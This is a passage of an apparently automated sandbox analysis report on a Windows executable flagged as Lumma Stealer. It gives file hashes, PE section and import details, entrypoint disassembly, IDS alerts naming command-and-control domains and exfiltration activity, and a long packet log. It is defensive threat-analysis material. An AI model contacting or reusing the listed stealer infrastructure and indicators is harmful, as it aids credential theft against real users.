SHA1:	8A74F03E8D3574192A3BD3A3444E0380E2E17650
SHA-256:	D7F642434C00DFF86ECA0F48FEA6158B394F79CE35233BB9BFB34E11EE88BDB5
SHA-512:	4CAC0A4502C46448F422B24DC1A0FDBA50BC9289000D82E893B489B10B5CD600E3F7350C448597DE27987A1CDA56C703B3CB9D03451FA6073094385B6A8B82DD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636575" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421535180639867
Encrypted:	false
SSDEEP:	6144:xSvfpi6ceLP/9skLmb0OTtWSPHaJG8nAgeMZMMhA2fX4WABlEnN90uhiTw:IvloTtW+EZMM6DFyn03w
MD5:	3AF9FBCD6F6C5AC3B2C427481A99153A
SHA1:	F01BACC0044521ECAA761E99BABA111CB6CA0EA5
SHA-256:	3712A3C59BA4657945877C1B83B4FE38565A8E54385162D32C30CB00EA97EC6E
SHA-512:	AE2811618AA9ECB6F4BA4B878240722CBAFBA40291DD44AAA8B58DF1D2517C72A4C5F9C904F3402D2C85998F85C3FB61D8178164DB56BDAD45D646E79FFB25C8
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.48Q..............................................................................................................................................................................................................................................................................................................................................p1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\1fxm3u0d.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.599614813633723
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1fxm3u0d.exe
File size:	644'096 bytes
MD5:	2ca092d4c58d496d25e1238185d31b6e
SHA1:	e06646a559cd47d169926ed515644d4ca78feec2
SHA256:	cd84eee729821ff54b7a766713b7b582005c91e34f7ca9f77e7dc121e14f6493
SHA512:	c81df55c728970a4c52309a1e610eb9d90e0715279000944c228acf44ef329a00413e42272274daffc69eecabc50a36a25679e53521c77fff5c2005286684595
SSDEEP:	12288:MC1YMNbTFoj0EBZxJFW2alZeBFJ+eIwxFiyzq3LOgPRIzBvPZTHpZlsL3nN:tvNbTWj0AZxq2aiBHPXIOSdRIzVxLpHO
TLSH:	4AD4D101B5C2D0B2F56720311764E73B293DB9618729CEEFD3E46B3E5A207C09A35B5A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....5&g..........................................@..........................@............@.....................................<..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x421e90
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67263502 [Sat Nov 2 14:19:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5061395a3e61942b18ff54c3c1c9037d

Entrypoint Preview

Instruction
call 00007F129CE05A6Ah
jmp 00007F129CE058CDh
mov ecx, dword ptr [0044E82Ch]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F129CE05A66h
test esi, ecx
jne 00007F129CE05A88h
call 00007F129CE05A91h
mov ecx, eax
cmp ecx, edi
jne 00007F129CE05A69h
mov ecx, BB40E64Fh
jmp 00007F129CE05A70h
test esi, ecx
jne 00007F129CE05A6Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [0044E82Ch], ecx
not ecx
pop edi
mov dword ptr [0044E828h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
and dword ptr [ebp-0Ch], 00000000h
lea eax, dword ptr [ebp-0Ch]
and dword ptr [ebp-08h], 00000000h
push eax
call dword ptr [0044C8DCh]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0044C898h]
xor dword ptr [ebp-04h], eax
call dword ptr [0044C894h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0044C924h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00450988h
call dword ptr [0044C8FCh]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F129CE0D613h
add esp, 0Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4c6a0	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0x2438	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x48560	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x40f70	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4c834	0x158	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ef5a	0x3f000	ce0e6988bab73ebaec1c4df67868e8a8	False	0.5620659722222222	data	6.952656508969145	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x40000	0xdb94	0xdc00	931f151ac4ff36a590b0f3a8a8bc53b7	False	0.5108132102272728	data	5.554667502069597	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4e000	0x3154	0x1600	5edc4d0030d5f354693fb90190e590ae	False	0.4089133522727273	data	4.768821879151084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x52000	0x8	0x200	6558dc8e53d1da1a60092fcc73822e86	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x53000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x54000	0x2438	0x2600	b7c6d007117394778142a1bfa572d3a0	False	0.7362253289473685	data	6.500264772704368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.right	0x57000	0x4b200	0x4c200	1f7d884afaa7e5396ea4a75b8761bb3e	False	1.0003399527914614	data	7.999467185140214	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CompareStringW, CreateEventW, CreateFileW, DecodePointer, DeleteAtom, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemFileCacheSize, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ResetEvent, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile

USER32.dll

TranslateMessage

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T11:32:58.450789+0100	2057097	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thighpecr .cyou)	1	192.168.2.5	56695	1.1.1.1	53	UDP
2024-12-18T11:32:58.679311+0100	2057093	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)	1	192.168.2.5	55811	1.1.1.1	53	UDP
2024-12-18T11:32:58.902357+0100	2057089	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site)	1	192.168.2.5	54162	1.1.1.1	53	UDP
2024-12-18T11:32:59.131332+0100	2057085	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site)	1	192.168.2.5	51538	1.1.1.1	53	UDP
2024-12-18T11:32:59.349775+0100	2057077	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (contemteny .site)	1	192.168.2.5	59548	1.1.1.1	53	UDP
2024-12-18T11:32:59.578043+0100	2057079	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dilemmadu .site)	1	192.168.2.5	64227	1.1.1.1	53	UDP
2024-12-18T11:32:59.810077+0100	2057083	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (faulteyotk .site)	1	192.168.2.5	65373	1.1.1.1	53	UDP
2024-12-18T11:33:00.036959+0100	2057071	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)	1	192.168.2.5	49546	1.1.1.1	53	UDP
2024-12-18T11:33:00.354666+0100	2057095	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)	1	192.168.2.5	55120	1.1.1.1	53	UDP
2024-12-18T11:33:02.147349+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	23.55.153.106	443	TCP
2024-12-18T11:33:02.959840+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49705	23.55.153.106	443	TCP
2024-12-18T11:33:04.632141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-18T11:33:08.830259+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-18T11:33:08.830259+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-18T11:33:10.402197+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	104.21.66.86	443	TCP
2024-12-18T11:33:11.438395+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49712	104.21.66.86	443	TCP
2024-12-18T11:33:11.438395+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49712	104.21.66.86	443	TCP
2024-12-18T11:33:12.986476+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	104.21.66.86	443	TCP
2024-12-18T11:33:16.870175+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-18T11:33:18.117298+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-18T11:33:19.509209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49724	104.21.66.86	443	TCP
2024-12-18T11:33:21.982900+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49731	104.21.66.86	443	TCP
2024-12-18T11:33:24.402351+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49738	104.21.66.86	443	TCP
2024-12-18T11:33:24.406261+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49738	104.21.66.86	443	TCP
2024-12-18T11:33:30.409861+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49758	104.21.66.86	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:33:00.743968964 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:00.744033098 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:00.744225979 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:00.757998943 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:00.758022070 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.147088051 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.147349119 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.150105953 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.150126934 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.150396109 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.190675974 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.192313910 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.239346027 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.959894896 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.959925890 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.959956884 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.959975004 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.959992886 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.960186958 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.960186958 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:02.960222960 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:02.960311890 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.127866030 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.127924919 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.128038883 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.128104925 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.128249884 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.158780098 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.158843040 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.158874035 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.158970118 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.159038067 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.234318018 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.234357119 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.234379053 CET	49705	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:33:03.234388113 CET	443	49705	23.55.153.106	192.168.2.5
Dec 18, 2024 11:33:03.400643110 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:03.400702953 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:03.400876999 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:03.401161909 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:03.401171923 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:04.632055044 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:04.632141113 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:04.635747910 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:04.635763884 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:04.636140108 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:04.645102024 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:04.645131111 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:04.645195961 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:08.830276966 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:08.830369949 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:08.830522060 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:08.854331970 CET	49708	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:08.854382038 CET	443	49708	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:09.187544107 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:09.187608004 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:09.187715054 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:09.188023090 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:09.188043118 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:10.402056932 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:10.402196884 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:10.403907061 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:10.403917074 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:10.404279947 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:10.412662029 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:10.412691116 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:10.412789106 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438297033 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438333035 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438349009 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438364983 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438380957 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438421011 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.438496113 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.438536882 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.438560963 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.446758986 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.446856976 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.446906090 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.446943045 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.464488029 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.464549065 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.464576960 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.518999100 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.557914972 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.612724066 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.612763882 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.628245115 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.628387928 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.628407955 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.632116079 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.632194042 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.632201910 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.632261038 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.632455111 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.632473946 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.632503986 CET	49712	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.632512093 CET	443	49712	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.761496067 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.761559963 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:11.761647940 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.762018919 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:11.762034893 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:12.986351013 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:12.986475945 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:12.987751007 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:12.987770081 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:12.988131046 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:12.989392042 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:12.989548922 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:12.989603043 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:15.259686947 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:15.259809971 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:15.260163069 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:15.263832092 CET	49713	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:15.263869047 CET	443	49713	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:15.662385941 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:15.662450075 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:15.663238049 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:15.663764954 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:15.663794994 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:16.870066881 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:16.870174885 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:16.871932983 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:16.871962070 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:16.872208118 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:16.873940945 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:16.874247074 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:16.874284983 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:16.874366999 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:16.874381065 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:18.117319107 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:18.117461920 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:18.117567062 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:18.117861032 CET	49718	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:18.117907047 CET	443	49718	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:18.302812099 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:18.302860022 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:18.302937031 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:18.303229094 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:18.303242922 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:19.508866072 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:19.509208918 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:19.510552883 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:19.510564089 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:19.510822058 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:19.511944056 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:19.512078047 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:19.512126923 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:19.512198925 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:19.512208939 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:20.401822090 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:20.401922941 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:20.402107000 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:20.402204990 CET	49724	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:20.402224064 CET	443	49724	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:20.766022921 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:20.766078949 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:20.766222000 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:20.766705990 CET	49731	443	192.168.2.5	104.21.66.86
Dec 18, 2024 11:33:20.766722918 CET	443	49731	104.21.66.86	192.168.2.5
Dec 18, 2024 11:33:21.982785940 CET	443	49731	104.21.66.86	192.168.2.5
